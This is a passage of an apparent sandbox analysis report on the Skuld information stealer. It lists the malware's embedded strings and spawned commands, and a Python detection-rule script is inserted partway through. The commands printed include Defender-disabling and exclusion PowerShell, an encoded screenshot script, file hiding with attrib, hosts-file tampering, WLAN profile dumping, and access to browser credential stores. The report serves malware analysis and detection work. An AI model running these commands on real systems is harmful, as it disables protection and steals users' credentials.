                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type TuesdayJanuaryOctoberMUI_StdMUI_DltAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutapdh.dllwindowswsarecvwsasendlookup writetoAES-CBCfips140SHA-224SHA-256SHA-384SHA-512avx512fInstAltInstNopalt -> nop -> any -> NRGBA64tls3desInitialExpiresSubjectcharsetos/execruntimeanswers]?)(.*)Ed25519MD5-RSAserial:eae_prkderived2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsavevmtoolsdvboxtraypestudiovmacthlpksdumperdebuggerstrongodgraywolf0harmonyreversalUSERNAMEEIEEIFYEGBQHURCCORXGKKZCoreleepcJBYQTQBOMARCI-PClmVwjj9bGRXNNIIELUCAS-PCjulia-pcXGNSVODUESPNHOOLORELEEPCVONRAHELTMKNGOMUJULIA-PC05h00Gi05ISYH9SHICQja5iTQZSBJVWMUspG1y1CecVtZ5wEBUiA1hkmOZFUCOD6o8yTi52Th7dk1xPrQORxJKNkgL50ksOpSqgFOf3Gj.seancedxd8DJ7clmvwjj9beset.com-CommandDisabled0.0.0.0 Web DataWaterfoxK-MeleonCyberfoxBlackHawUsernamePasswordBrowsers```%s```ChromiumElementsCatalinaQIP SurfpasswordbancairemetamaskdatabasePicturesOneDriveindex.jsSettingssettings.featherNovolinealts.txtPaladiumgames-%s
                        Source: SecurityHealthSystray.exe.0.drBinary or memory string: runtime: sp=abi mismatchwrong timersnot pollableCypro_MinoanMeetei_MayekPahawh_HmongSora_SompengSyloti_NagriPdhOpenQueryLittleEndianmultipathtcp127.0.0.1:53no such hostunknown portCIDR addressinvalid portgetaddrinfowtransmitfileCreateEventACreateThreadGetTickCountPeekMessageWNetGetDCNameinvalid baseInstAltMatchunexpected )altmatch -> anynotnl -> tlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap trafficMime-VersionX-ImforwardsX-Powered-ByContent Type (sensitive)gotypesaliasRCodeSuccessRCodeRefusedunknown sizeECDSA-SHA256ECDSA-SHA384ECDSA-SHA512caller errorCoInitializeoleaut32.dllVariantClearSysStringLenRoInitializeSERIALNUMBERavx5124fmapsavx512bitalgvgauthservicevmwareservicejoeboxcontrolprocesshackerhttp debuggerextremedumperprotection_idw0fjuOVmCcP5Acompname_5076SYKGUIDE-WS17DESKTOP-BUGIOCOMPNAME_4047DOMIC-DESKTOPharry johnsonRGzcBUyrznRegw0fjuovmccp5aHarry Johnsonsal.rosenburg34.85.253.170109.74.154.9034.145.89.174192.40.57.234109.74.154.9134.145.195.5887.166.50.21335.192.93.10779.104.209.33213.33.142.5034.141.245.2588.132.231.7134.105.72.24193.216.75.209195.239.51.5920.99.160.17334.85.243.24184.147.54.113195.74.76.222192.87.28.10364.124.12.16234.105.183.6834.142.74.22092.211.55.199109.74.154.9235.229.69.22723.128.248.46scanguard.compcprotect.comus.norton.comkaspersky.combullguard.comzonealarm.combrowsers-tempdownloads.txtplaces.sqlitenssA102 errorFiles StealerdiscordcanaryBetterDiscorditerations_ivaccounts.jsonmeteor-clientCheatBreakersRise (Intent)Local StorageContenu de laAuthorization`Nitro Basic`AuthenticatorIsUserAnAdminFindFirstFilelevel 3 resetsrmount errortimer expiredexchange fullRegEnumKeyExWRegOpenKeyExWCertOpenStoreFindNextFileWMapViewOfFileVirtualUnlockWriteConsoleWFreeAddrInfoWgethostbynamegetservbynameRegDeleteKeyWRegEnumValueW relative to %s: %s (%v)%sempty integerunsupported: RtlMoveMemoryOpenClipboardSTREAM_CLOSEDCONNECT_ERRORWINDOW_UPDATECache-ControlLast-ModifiedAccept-RangesIf-None-Match[FrameHeader invalid base accept-rangesauthorizationcache-controlcontent-rangeif-none-matchlast-modifiedFQDN too longsocks connectReset ContentLoop Detectedfield name %q3814697265625GetDriveTypeWDeleteServiceStartServiceWFindResourceWModule32NextWThread32FirstWaitCommEventRtlGetVersionRtlInitStringCoTaskMemFreeEnumProcessesShellExecuteWExitWindowsExGetClassNameWtimeEndPeriodWTSFreeMemorydalTLDpSugct?GetTempPath2WwakeableSleepprofMemActiveprofMemFuturetraceStackTabexecRInternaltestRInternalGC sweep waitsynctest.Waitout of memory is nil, not value method span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}
                        Source: skuld.exe, 00000000.00000002.2739920136.0000027D3C8BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\skuld.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\skuld.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\Desktop\skuld.exeFile written: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\skuld.exe
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.cmdline"
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9F3.tmp" "c:\Users\user\AppData\Local\Temp\dh1o0wbe\CSC88D051478A0408BB4BF8545E397BDC4.TMP"
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiabt
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
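The process-creation and file-access entries above are the raw material for a detection rule set: Defender tampering via Set-MpPreference and Add-MpPreference, an encoded PowerShell payload, attrib +h +s on the dropped copy, the read-only toggle around the hosts file, the netsh WLAN profile dump, the WMIC hardware fingerprinting, and enumeration of Chrome and Edge credential stores. The following is an added example (it is not code from the Joe Sandbox report or from the Skuld project) that parses entries in the report's own "Source: ...<event>: ..." layout and runs those rules over them. The rule names are mine; the sample lines are copied from the entries above with the "Jump to behavior" link text dropped; the -EncodedCommand line is constructed from a shortened copy of the decoded screenshot script, because the report prints the sample's real payload lowercased and truncated, and a lowercased Base64 string no longer decodes to the original UTF-16LE script (the example shows that too).

```python
"""Triage of the behaviour entries above: added example, not code from the Joe
Sandbox report or from the Skuld project. Sample lines are copied from the
report (minus the "Jump to behavior" link text); the -EncodedCommand line is
constructed from a shortened copy of the decoded screenshot script."""
import base64
import re

# The report glues the event name onto the source path ("skuld.exeProcess
# created:"), so split on the known event names rather than on whitespace.
EVENT_RE = re.compile(
    r"^Source:\s*(?P<source>.*?)"
    r"(?P<event>Process created|Queries volume information|File written):\s*"
    r"(?P<detail>.*)$"
)

# Command-line rules for the behaviours the report flags (rule names are mine).
# Case-insensitive, because the report renders some command lines in lower case.
CMDLINE_RULES = {
    "defender_disable": re.compile(r"Set-MpPreference\b.*-Disable\w+\s+\$true", re.I),
    "defender_exclusion": re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Process|Extension)\b", re.I),
    "encoded_command": re.compile(r"-e(ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{20,})", re.I),
    "hidden_system_attrib": re.compile(r"\battrib\b(?=.*\+h\b)(?=.*\+s\b)", re.I),
    "hosts_readonly_toggle": re.compile(r"\battrib\b.*[-+]r\b.*\\drivers\\etc\\hosts", re.I),
    "wlan_profile_dump": re.compile(r"\bnetsh\b.*\bwlan\b.*\bshow\b.*\bprofiles?\b", re.I),
    "hardware_fingerprint": re.compile(
        r"\bwmic\b.*\b(csproduct get uuid|win32_videocontroller|cpu get name|os get caption)\b", re.I),
}

# Paths whose enumeration points at credential theft: Chromium's "Local State"
# holds the DPAPI-wrapped key for the profile's saved logins and cookies, and
# "Local Storage\leveldb" is the site storage that stealers mine for tokens.
SENSITIVE_PATHS = {
    "chromium_local_state": re.compile(r"\\User Data\\Local State\b", re.I),
    "chromium_leveldb": re.compile(r"\\Local Storage\\leveldb\b", re.I),
}


def encode_powershell(script):
    """Build an -EncodedCommand payload as powershell.exe expects it: Base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Reverse of encode_powershell; None when the text is not valid Base64 or UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Shortened copy of the decoded script from the report (constructed for this example).
SCREENSHOT_SCRIPT = (
    "Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms\r\n"
    "$screenshots = [Screenshot]::CaptureScreens()\r\n"
    '$screenshot.Save("./Display ($($i+1)).png")\r\n'
)

SRC = r"Source: C:\Users\user\Desktop\skuld.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell"
SAMPLE_LINES = [
    SRC + "Process created: " + PS + " Set-MpPreference -DisableIntrusionPreventionSystem $true"
    " -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true"
    " -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force"
    " -MAPSReporting Disabled -SubmitSamplesConsent NeverSend",
    SRC + "Process created: " + PS + r" -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\skuld.exe",
    SRC + "Process created: " + PS + ".exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
    + encode_powershell(SCREENSHOT_SCRIPT),
    SRC + r"Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\skuld.exe",
    SRC + r"Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts",
    SRC + r"File written: C:\Windows\System32\drivers\etc\hosts",
    SRC + r"Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles",
    SRC + r"Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID",
    SRC + r"Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name",
    SRC + r"Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation",
    SRC + r"Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation",
]


def triage(lines):
    """Return ({rule: [matching detail, ...]}, [decoded -EncodedCommand scripts, None if undecodable])."""
    hits, decoded = {}, []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue
        event, detail = m.group("event"), m.group("detail")
        if event == "Process created":
            for name, rule in CMDLINE_RULES.items():
                hit = rule.search(detail)
                if hit:
                    hits.setdefault(name, []).append(detail)
                    if name == "encoded_command":
                        decoded.append(decode_encoded_command(hit.group(2)))
        elif event == "Queries volume information":
            path = detail.rsplit(" VolumeInformation", 1)[0]
            for name, rule in SENSITIVE_PATHS.items():
                if rule.search(path):
                    hits.setdefault(name, []).append(path)
        elif event == "File written" and detail.lower().endswith(r"\drivers\etc\hosts"):
            hits.setdefault("hosts_file_written", []).append(detail)
    return hits, decoded


if __name__ == "__main__":
    found, scripts = triage(SAMPLE_LINES)
    print({name: len(v) for name, v in found.items()}, scripts)
```

The same rules apply unchanged to Sysmon event ID 1 or Windows Security 4688 command lines; only EVENT_RE is specific to the report layout. The decoded payload matters because the encoded-command rule alone fires on benign administration scripts; the Add-Type plus CopyFromScreen content is what separates a screenshot capture from a signed deployment script.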
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00014E000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000003.1509958307.000000C000AFC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: skuld.exe, 00000000.00000003.1509958307.000000C000AFC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: BluetoothNotificationAreaIconWindowClassBluetoothNotificationAreaIconWindowClassbluetoothnotificationareaiconwindowclassDWM Notification WindowDWM Notification Windowdwm notification windowProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault ime
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00014E000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000003.1509958307.000000C000AFC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: program manager
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00014E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DWM Notification WindowDWM Notification Windowdwm notification windowProgram ManagerProgram Managerprogram managerDefault IMEDefault IME
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Desktop VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Documents\My Music VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Documents\My Pictures VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Documents\My Videos VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Videos VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Pictures VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Epic Games VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Minecraft VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\OneDrive VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Desktop VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Downloads VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Documents VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Documents\My Music VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Documents\My Pictures VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Documents\My Videos VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Videos VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Pictures VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Music VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop\MXPXCVPDVN VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop\SQRKHNBNYN VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\My Music VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\My Pictures VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\My Videos VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Downloads VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Documents VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Music VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop\RAYHIWGKDI VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\MXPXCVPDVN VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\RAYHIWGKDI VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\SQRKHNBNYN VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\YPSIACHYXW VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Videos VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Pictures VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Music VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\commonfiles-temp VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public\Minecraft VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-user VolumeInformation
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-user\user VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Minecraft VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
